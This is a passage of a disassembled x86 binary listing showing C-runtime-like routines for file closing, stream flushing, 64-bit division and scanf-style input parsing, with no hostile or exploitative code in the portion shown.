jnz short loc_408A90
test byte ptr [eax+2Ch], 1
jz short loc_408A90
loc_408A7A: ; CODE XREF: sub_408A4D+20�j
push 2
call sub_40ED7D
push 1
mov edi, eax
call sub_40ED7D
cmp eax, edi
pop ecx
pop ecx
jz short loc_408AAC
loc_408A90: ; CODE XREF: sub_408A4D+25�j
; sub_408A4D+2B�j
push esi
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0DC
test eax, eax
jnz short loc_408AAC
call ds:dword_41D0F0
mov edi, eax
jmp short loc_408AAE
; ---------------------------------------------------------------------------
loc_408AAC: ; CODE XREF: sub_408A4D+10�j
; sub_408A4D+41�j ...
xor edi, edi
loc_408AAE: ; CODE XREF: sub_408A4D+5D�j
push esi
call sub_40ECFC
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
test edi, edi
mov eax, ds:dword_433CA0[eax*4]
pop ecx
mov byte ptr [eax+esi+4], 0
jz short loc_408ADC
push edi
call sub_4057F9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_408ADE
; ---------------------------------------------------------------------------
loc_408ADC: ; CODE XREF: sub_408A4D+81�j
xor eax, eax
loc_408ADE: ; CODE XREF: sub_408A4D+8D�j
pop edi
pop esi
retn
sub_408A4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AE1 proc near ; CODE XREF: sub_403451+48�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_421578
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_408B10
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_408B08: ; CODE XREF: sub_408AE1+5C�j
or eax, 0FFFFFFFFh
jmp loc_408B9E
; ---------------------------------------------------------------------------
loc_408B10: ; CODE XREF: sub_408AE1+12�j
xor edi, edi
cmp eax, edi
jl short loc_408B1E
cmp eax, ds:dword_433C84
jb short loc_408B3F
loc_408B1E: ; CODE XREF: sub_408AE1+33�j
; sub_408AE1+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_408B08
; ---------------------------------------------------------------------------
loc_408B3F: ; CODE XREF: sub_408AE1+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_408B1E
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_408B80
push [ebp+arg_0]
call sub_408A4D
pop ecx
mov [ebp+var_1C], eax
jmp short loc_408B8F
; ---------------------------------------------------------------------------
loc_408B80: ; CODE XREF: sub_408AE1+8F�j
call sub_4057D3
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_408B8F: ; CODE XREF: sub_408AE1+9D�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408BA4
mov eax, [ebp+var_1C]
loc_408B9E: ; CODE XREF: sub_408AE1+2A�j
call __SEH_epilog4
retn
sub_408AE1 endp
; =============== S U B R O U T I N E =======================================
sub_408BA4 proc near ; CODE XREF: sub_408AE1+B5�p
; DATA XREF: J8@F_7_S:00421590�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_408BA4 endp
; =============== S U B R O U T I N E =======================================
sub_408BAE proc near ; CODE XREF: sub_403451+3C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_408BD8
test al, 8
jz short loc_408BD8
push dword ptr [esi+8]
call sub_403603
and dword ptr [esi+0Ch], 0FFFFFBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_408BD8: ; CODE XREF: sub_408BAE+A�j
; sub_408BAE+E�j
pop esi
retn
sub_408BAE endp
; =============== S U B R O U T I N E =======================================
sub_408BDA proc near ; CODE XREF: sub_403451+34�p
; sub_4087B1+15�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_408C2E
test ax, 108h
jz short loc_408C2E
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_408C2D
push edi
push eax
push esi
call sub_408A20
pop ecx
push eax
call sub_40D420
add esp, 0Ch
cmp eax, edi
jnz short loc_408C26
mov eax, [esi+0Ch]
test al, al
jns short loc_408C2D
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_408C2D
; ---------------------------------------------------------------------------
loc_408C26: ; CODE XREF: sub_408BDA+3B�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_408C2D: ; CODE XREF: sub_408BDA+25�j
; sub_408BDA+42�j ...
pop edi
loc_408C2E: ; CODE XREF: sub_408BDA+13�j
; sub_408BDA+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_408BDA endp
; =============== S U B R O U T I N E =======================================
sub_408C3C proc near ; CODE XREF: sub_408C7E+69�p
; sub_408C7E+84�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_408C4E
push esi
call sub_408C7E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C4E: ; CODE XREF: sub_408C3C+7�j
push esi
call sub_408BDA
test eax, eax
pop ecx
jz short loc_408C5E
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C5E: ; CODE XREF: sub_408C3C+1B�j
test word ptr [esi+0Ch], 4000h
jz short loc_408C7A
push esi
call sub_408A20
push eax
call sub_40F04F
pop ecx
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C7A: ; CODE XREF: sub_408C3C+28�j
xor eax, eax
pop esi
retn
sub_408C3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C7E proc near ; CODE XREF: sub_408C3C+A�p
; sub_408D58+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00408D31 SIZE 0000001E BYTES
push 14h
push offset dword_421598
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_24], edi
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_408C9F: ; CODE XREF: sub_408C7E+9B�j
mov [ebp+var_20], esi
cmp esi, ds:dword_434DC0
jge loc_408D31
mov eax, ds:dword_433DA0
lea eax, [eax+esi*4]
cmp [eax], edi
jz short loc_408D18
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_408D18
push eax
push esi
call sub_40818A
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, ds:dword_433DA0
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_408D10
cmp [ebp+arg_0], edx
jnz short loc_408CF7
push eax
call sub_408C3C
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_408D10
inc [ebp+var_1C]
jmp short loc_408D10
; ---------------------------------------------------------------------------
loc_408CF7: ; CODE XREF: sub_408C7E+66�j
cmp [ebp+arg_0], edi
jnz short loc_408D10
test cl, 2
jz short loc_408D10
push eax
call sub_408C3C
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_408D10
or [ebp+var_24], eax
loc_408D10: ; CODE XREF: sub_408C7E+61�j
; sub_408C7E+72�j ...
mov [ebp+ms_exc.disabled], edi
call sub_408D20
loc_408D18: ; CODE XREF: sub_408C7E+3A�j
; sub_408C7E+42�j
inc esi
jmp short loc_408C9F
sub_408C7E endp
; =============== S U B R O U T I N E =======================================
sub_408D1B proc near ; DATA XREF: J8@F_7_S:004215BC�o
xor edi, edi
mov esi, [ebp-20h]
sub_408D1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_408D20 proc near ; CODE XREF: sub_408C7E+95�p
mov eax, ds:dword_433DA0
push dword ptr [eax+esi*4]
push esi
call sub_4081DC
pop ecx
pop ecx
retn
sub_408D20 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_408C7E
loc_408D31: ; CODE XREF: sub_408C7E+2A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408D4F
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_408D49
mov eax, [ebp+var_24]
loc_408D49: ; CODE XREF: sub_408C7E+C6�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_408C7E
; =============== S U B R O U T I N E =======================================
sub_408D4F proc near ; CODE XREF: sub_408C7E+BA�p
; DATA XREF: J8@F_7_S:004215B0�o
push 1
call sub_40591F
pop ecx
retn
sub_408D4F endp
; =============== S U B R O U T I N E =======================================
sub_408D58 proc near ; CODE XREF: sub_40813B�p
push 1
call sub_408C7E
pop ecx
retn
sub_408D58 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408D70 proc near ; CODE XREF: sub_403540+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_408D92
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_408DD3
; ---------------------------------------------------------------------------
loc_408D92: ; CODE XREF: sub_408D70+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_408DA0: ; CODE XREF: sub_408D70+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_408DA0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_408DCE
cmp edx, [esp+8+arg_4]
ja short loc_408DCE
jb short loc_408DCF
cmp eax, [esp+8+arg_0]
jbe short loc_408DCF
loc_408DCE: ; CODE XREF: sub_408D70+4E�j
; sub_408D70+54�j
dec esi
loc_408DCF: ; CODE XREF: sub_408D70+56�j
; sub_408D70+5C�j
xor edx, edx
mov eax, esi
loc_408DD3: ; CODE XREF: sub_408D70+20�j
pop esi
pop ebx
retn 10h
sub_408D70 endp
; =============== S U B R O U T I N E =======================================
sub_408DD8 proc near ; CODE XREF: J8@F_7_S:00409234�p
; J8@F_7_S:004092AE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esi]
cmp [esp+arg_0], eax
jnz short loc_408E28
mov ecx, [edi]
cmp ecx, [esp+arg_4]
push 2
push eax
jnz short loc_408E17
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov [edi], eax
jnz short loc_408DFB
loc_408DF8: ; CODE XREF: sub_408DD8+4A�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_408DFB: ; CODE XREF: sub_408DD8+1E�j
mov eax, [esp+arg_8]
mov dword ptr [eax], 1
push dword ptr [esi]
push [esp+4+arg_4]
push dword ptr [edi]
call sub_407BF0
add esp, 0Ch
jmp short loc_408E26
; ---------------------------------------------------------------------------
loc_408E17: ; CODE XREF: sub_408DD8+11�j
push ecx
call sub_40780D
add esp, 0Ch
test eax, eax
jz short loc_408DF8
mov [edi], eax
loc_408E26: ; CODE XREF: sub_408DD8+3D�j
shl dword ptr [esi], 1
loc_408E28: ; CODE XREF: sub_408DD8+6�j
xor eax, eax
inc eax
retn
sub_408DD8 endp
; =============== S U B R O U T I N E =======================================
sub_408E2C proc near ; CODE XREF: sub_408E42+7�p
; J8@F_7_S:00409148�p ...
dec dword ptr [edx+4]
js short loc_408E3A
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_408E3A: ; CODE XREF: sub_408E2C+3�j
push edx
call sub_409C8D
pop ecx
retn
sub_408E2C endp
; =============== S U B R O U T I N E =======================================
sub_408E42 proc near ; CODE XREF: J8@F_7_S:00408FB6�p
; J8@F_7_S:0040913A�p
arg_0 = dword ptr 4
push ebx
loc_408E43: ; CODE XREF: sub_408E42+1F�j
mov edx, [esp+4+arg_0]
inc dword ptr [esi]
call sub_408E2C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_408E63
movzx eax, bl
push eax
call sub_40F276
test eax, eax
pop ecx
jnz short loc_408E43
loc_408E63: ; CODE XREF: sub_408E42+11�j
mov eax, ebx
pop ebx
retn
sub_408E42 endp
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-18Ch]
sub esp, 1FCh
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+188h], eax
mov eax, [ebp+1A0h]
push ebx
push esi
mov esi, [ebp+194h]
xor ebx, ebx
push edi
mov edi, [ebp+198h]
cmp edi, ebx
mov [ebp-58h], eax
lea eax, [ebp+8]
mov [ebp-14h], esi
mov [ebp-28h], edi
mov [ebp-24h], eax
mov dword ptr [ebp-4Ch], 15Eh
mov [ebp-44h], ebx
mov [ebp-5Ch], ebx
mov [ebp-4], ebx
jnz short loc_408EDC
loc_408EBC: ; CODE XREF: J8@F_7_S:00408EDE�j
; J8@F_7_S:00408F2D�j ...
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_409A9C
; ---------------------------------------------------------------------------
loc_408EDC: ; CODE XREF: J8@F_7_S:00408EBA�j
cmp esi, ebx
jz short loc_408EBC
test byte ptr [esi+0Ch], 40h
jnz loc_408F7B
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408F24
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_408F24
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_408F29
; ---------------------------------------------------------------------------
loc_408F24: ; CODE XREF: J8@F_7_S:00408EF4�j
; J8@F_7_S:00408F00�j
mov eax, offset dword_423BD0
loc_408F29: ; CODE XREF: J8@F_7_S:00408F22�j
test byte ptr [eax+24h], 7Fh
jnz short loc_408EBC
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408F69
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_408F69
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_408F6E
; ---------------------------------------------------------------------------
loc_408F69: ; CODE XREF: J8@F_7_S:00408F39�j
; J8@F_7_S:00408F45�j
mov eax, offset dword_423BD0
loc_408F6E: ; CODE XREF: J8@F_7_S:00408F67�j
test byte ptr [eax+24h], 80h
jnz loc_408EBC
mov edi, [ebp-28h]
loc_408F7B: ; CODE XREF: J8@F_7_S:00408EE4�j
push dword ptr [ebp+19Ch]
lea ecx, [ebp-6Ch]
call sub_40271F
mov al, [edi]
test al, al
mov [ebp-15h], bl
mov [ebp+4], ebx
mov [ebp-3Ch], ebx
jz loc_409A8C
mov edi, [ebp-28h]
loc_408F9F: ; CODE XREF: J8@F_7_S:00409A29�j
movzx eax, al
push eax
call sub_40F276
test eax, eax
pop ecx
jz short loc_408FE0
push dword ptr [ebp-14h]
dec dword ptr [ebp+4]
lea esi, [ebp+4]
call sub_408E42
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408FCC
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_408FCC: ; CODE XREF: J8@F_7_S:00408FBF�j
; J8@F_7_S:00408FD9�j
inc edi
movzx eax, byte ptr [edi]
push eax
call sub_40F276
test eax, eax
pop ecx
jnz short loc_408FCC
jmp loc_409A25
; ---------------------------------------------------------------------------
loc_408FE0: ; CODE XREF: J8@F_7_S:00408FAB�j
cmp byte ptr [edi], 25h
jnz loc_4099CD
xor eax, eax
mov [ebp-54h], eax
mov [ebp-3Dh], al
mov [ebp-1Ch], eax
mov [ebp-2Ch], eax
mov [ebp-0Ch], eax
mov [ebp-18h], al
mov [ebp-17h], al
mov [ebp-0Dh], al
mov [ebp+3], al
mov [ebp-16h], al
mov [ebp-5], al
mov byte ptr [ebp-0Eh], 1
mov [ebp-48h], eax
xor esi, esi
loc_409015: ; CODE XREF: J8@F_7_S:004090E0�j
inc edi
movzx ebx, byte ptr [edi]
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz short loc_40903C
mov eax, [ebp-0Ch]
inc dword ptr [ebp-2Ch]
imul eax, 0Ah
lea eax, [eax+ebx-30h]
mov [ebp-0Ch], eax
jmp loc_4090DC
; ---------------------------------------------------------------------------
loc_40903C: ; CODE XREF: J8@F_7_S:00409025�j
cmp ebx, 4Eh
jg short loc_4090B2
jz loc_4090DC
cmp ebx, 2Ah
jz short loc_4090AD
cmp ebx, 46h
jz loc_4090DC
cmp ebx, 49h
jz short loc_409064
cmp ebx, 4Ch
jnz short loc_4090C1
inc byte ptr [ebp-0Eh]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409064: ; CODE XREF: J8@F_7_S:00409058�j
mov cl, [edi+1]
cmp cl, 36h
jnz short loc_409081
lea eax, [edi+2]
cmp byte ptr [eax], 34h
jnz short loc_409081
loc_409074: ; CODE XREF: J8@F_7_S:004090CC�j
inc dword ptr [ebp-48h]
mov edi, eax
mov [ebp-34h], esi
mov [ebp-30h], esi
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409081: ; CODE XREF: J8@F_7_S:0040906A�j
; J8@F_7_S:00409072�j
cmp cl, 33h
jnz short loc_409092
lea eax, [edi+2]
cmp byte ptr [eax], 32h
jnz short loc_409092
mov edi, eax
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409092: ; CODE XREF: J8@F_7_S:00409084�j
; J8@F_7_S:0040908C�j
cmp cl, 64h
jz short loc_4090DC
cmp cl, 69h
jz short loc_4090DC
cmp cl, 6Fh
jz short loc_4090DC
cmp cl, 78h
jz short loc_4090DC
cmp cl, 58h
jnz short loc_4090C1
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090AD: ; CODE XREF: J8@F_7_S:0040904A�j
inc byte ptr [ebp-0Dh]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090B2: ; CODE XREF: J8@F_7_S:0040903F�j
cmp ebx, 68h
jz short loc_4090D6
cmp ebx, 6Ch
jz short loc_4090C6
cmp ebx, 77h
jz short loc_4090D1
loc_4090C1: ; CODE XREF: J8@F_7_S:0040905D�j
; J8@F_7_S:004090A9�j
inc byte ptr [ebp+3]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090C6: ; CODE XREF: J8@F_7_S:004090BA�j
lea eax, [edi+1]
cmp byte ptr [eax], 6Ch
jz short loc_409074
inc byte ptr [ebp-0Eh]
loc_4090D1: ; CODE XREF: J8@F_7_S:004090BF�j
inc byte ptr [ebp-5]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090D6: ; CODE XREF: J8@F_7_S:004090B5�j
dec byte ptr [ebp-0Eh]
dec byte ptr [ebp-5]
loc_4090DC: ; CODE XREF: J8@F_7_S:00409037�j
; J8@F_7_S:00409041�j ...
cmp byte ptr [ebp+3], 0
jz loc_409015
cmp byte ptr [ebp-0Dh], 0
mov [ebp-28h], edi
jnz short loc_4090FD
mov eax, [ebp-58h]
mov esi, [eax]
mov [ebp-70h], eax
add eax, 4
mov [ebp-58h], eax
loc_4090FD: ; CODE XREF: J8@F_7_S:004090ED�j
cmp byte ptr [ebp-5], 0
mov [ebp-38h], esi
mov byte ptr [ebp+3], 0
jnz short loc_40911C
mov al, [edi]
cmp al, 53h
jz short loc_409118
cmp al, 43h
mov byte ptr [ebp-5], 0FFh
jnz short loc_40911C
loc_409118: ; CODE XREF: J8@F_7_S:0040910E�j
mov byte ptr [ebp-5], 1
loc_40911C: ; CODE XREF: J8@F_7_S:00409108�j
; J8@F_7_S:00409116�j
movzx ebx, byte ptr [edi]
or ebx, 20h
cmp ebx, 6Eh
mov [ebp-20h], ebx
jz short loc_40915F
cmp ebx, 63h
jz short loc_409142
cmp ebx, 7Bh
jz short loc_409142
push dword ptr [ebp-14h]
lea esi, [ebp+4]
call sub_408E42
pop ecx
jmp short loc_40914D
; ---------------------------------------------------------------------------
loc_409142: ; CODE XREF: J8@F_7_S:0040912D�j
; J8@F_7_S:00409132�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
loc_40914D: ; CODE XREF: J8@F_7_S:00409140�j
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_409A59
mov esi, [ebp-38h]
mov edi, [ebp-28h]
loc_40915F: ; CODE XREF: J8@F_7_S:00409128�j
mov ecx, [ebp-2Ch]
test ecx, ecx
jz short loc_409170
cmp dword ptr [ebp-0Ch], 0
jz loc_409A31
loc_409170: ; CODE XREF: J8@F_7_S:00409164�j
cmp ebx, 6Fh
jg loc_40957C
jz loc_4097A7
cmp ebx, 63h
jz loc_40946E
push 64h
pop eax
cmp ebx, eax
jz loc_4097A7
jle loc_4095A6
cmp ebx, 67h
jle short loc_4091D6
cmp ebx, 69h
jz short loc_4091BE
cmp ebx, 6Eh
jnz loc_4095A6
cmp byte ptr [ebp-0Dh], 0
mov edi, [ebp+4]
jz loc_4099A1
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4091BE: ; CODE XREF: J8@F_7_S:004091A1�j
mov [ebp-20h], eax
loc_4091C1: ; CODE XREF: J8@F_7_S:0040959B�j
mov ebx, [ebp-4]
cmp ebx, 2Dh
jnz loc_40968F
mov byte ptr [ebp-17h], 1
jmp loc_409694
; ---------------------------------------------------------------------------
loc_4091D6: ; CODE XREF: J8@F_7_S:0040919C�j
xor ebx, ebx
cmp dword ptr [ebp-4], 2Dh
jnz short loc_4091E7
mov eax, [ebp-24h]
mov byte ptr [eax], 2Dh
inc ebx
jmp short loc_4091ED
; ---------------------------------------------------------------------------
loc_4091E7: ; CODE XREF: J8@F_7_S:004091DC�j
cmp dword ptr [ebp-4], 2Bh
jnz short loc_4091FE
loc_4091ED: ; CODE XREF: J8@F_7_S:004091E5�j
dec dword ptr [ebp-0Ch]
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
loc_4091FE: ; CODE XREF: J8@F_7_S:004091EB�j
cmp dword ptr [ebp-2Ch], 0
jnz short loc_409208
or dword ptr [ebp-0Ch], 0FFFFFFFFh
loc_409208: ; CODE XREF: J8@F_7_S:00409202�j
movzx eax, byte ptr [ebp-4]
jmp short loc_409255
; ---------------------------------------------------------------------------
loc_40920E: ; CODE XREF: J8@F_7_S:0040925E�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409260
mov al, [ebp-4]
mov ecx, [ebp-24h]
inc dword ptr [ebp-1Ch]
mov [ebx+ecx], al
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_409255: ; CODE XREF: J8@F_7_S:0040920C�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_40920E
loc_409260: ; CODE XREF: J8@F_7_S:00409216�j
mov eax, [ebp-6Ch]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
cmp al, [ebp-4]
mov [ebp-18h], al
jnz loc_409316
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_409316
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ecx, [ebp-24h]
mov [ebp-4], eax
mov al, [ebp-18h]
mov [ebx+ecx], al
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
movzx eax, byte ptr [ebp-4]
jmp short loc_40930B
; ---------------------------------------------------------------------------
loc_4092C4: ; CODE XREF: J8@F_7_S:00409314�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409316
mov eax, [ebp-24h]
mov cl, [ebp-4]
inc dword ptr [ebp-1Ch]
mov [ebx+eax], cl
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_40930B: ; CODE XREF: J8@F_7_S:004092C2�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_4092C4
loc_409316: ; CODE XREF: J8@F_7_S:00409273�j
; J8@F_7_S:00409281�j ...
cmp dword ptr [ebp-1Ch], 0
jz loc_409416
cmp dword ptr [ebp-4], 65h
jz short loc_409330
cmp dword ptr [ebp-4], 45h
jnz loc_409416
loc_409330: ; CODE XREF: J8@F_7_S:00409324�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_409416
mov eax, [ebp-24h]
mov byte ptr [ebx+eax], 65h
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp eax, 2Dh
mov [ebp-4], eax
jnz short loc_40939B
mov eax, [ebp-24h]
mov byte ptr [ebx+eax], 2Dh
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
jmp short loc_4093A1
; ---------------------------------------------------------------------------
loc_40939B: ; CODE XREF: J8@F_7_S:00409376�j
cmp dword ptr [ebp-4], 2Bh
jnz short loc_4093BE
loc_4093A1: ; CODE XREF: J8@F_7_S:00409399�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jnz short loc_4093B0
and [ebp-0Ch], eax
jmp short loc_4093BE
; ---------------------------------------------------------------------------
loc_4093B0: ; CODE XREF: J8@F_7_S:004093A9�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
loc_4093BE: ; CODE XREF: J8@F_7_S:0040939F�j
; J8@F_7_S:004093AE�j
movzx eax, byte ptr [ebp-4]
jmp short loc_40940B
; ---------------------------------------------------------------------------
loc_4093C4: ; CODE XREF: J8@F_7_S:00409414�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409416
mov eax, [ebp-24h]
mov cl, [ebp-4]
inc dword ptr [ebp-1Ch]
mov [ebx+eax], cl
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_40940B: ; CODE XREF: J8@F_7_S:004093C2�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_4093C4
loc_409416: ; CODE XREF: J8@F_7_S:0040931A�j
; J8@F_7_S:0040932A�j ...
dec dword ptr [ebp+4]
cmp dword ptr [ebp-4], 0FFFFFFFFh
jz short loc_40942C
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_40942C: ; CODE XREF: J8@F_7_S:0040941D�j
cmp dword ptr [ebp-1Ch], 0
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
mov eax, [ebp-24h]
inc dword ptr [ebp-3Ch]
lea ecx, [ebp-6Ch]
push ecx
push eax
push dword ptr [ebp-38h]
mov byte ptr [ebx+eax], 0
movsx eax, byte ptr [ebp-0Eh]
dec eax
push eax
push ds:off_423F9C
call sub_405193
pop ecx
call eax
add esp, 10h
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_40946E: ; CODE XREF: J8@F_7_S:00409182�j
test ecx, ecx
jnz short loc_40947C
inc dword ptr [ebp-0Ch]
mov dword ptr [ebp-2Ch], 1
loc_40947C: ; CODE XREF: J8@F_7_S:00409470�j
; J8@F_7_S:0040958A�j
cmp byte ptr [ebp-5], 0
jle short loc_409486
mov byte ptr [ebp-16h], 1
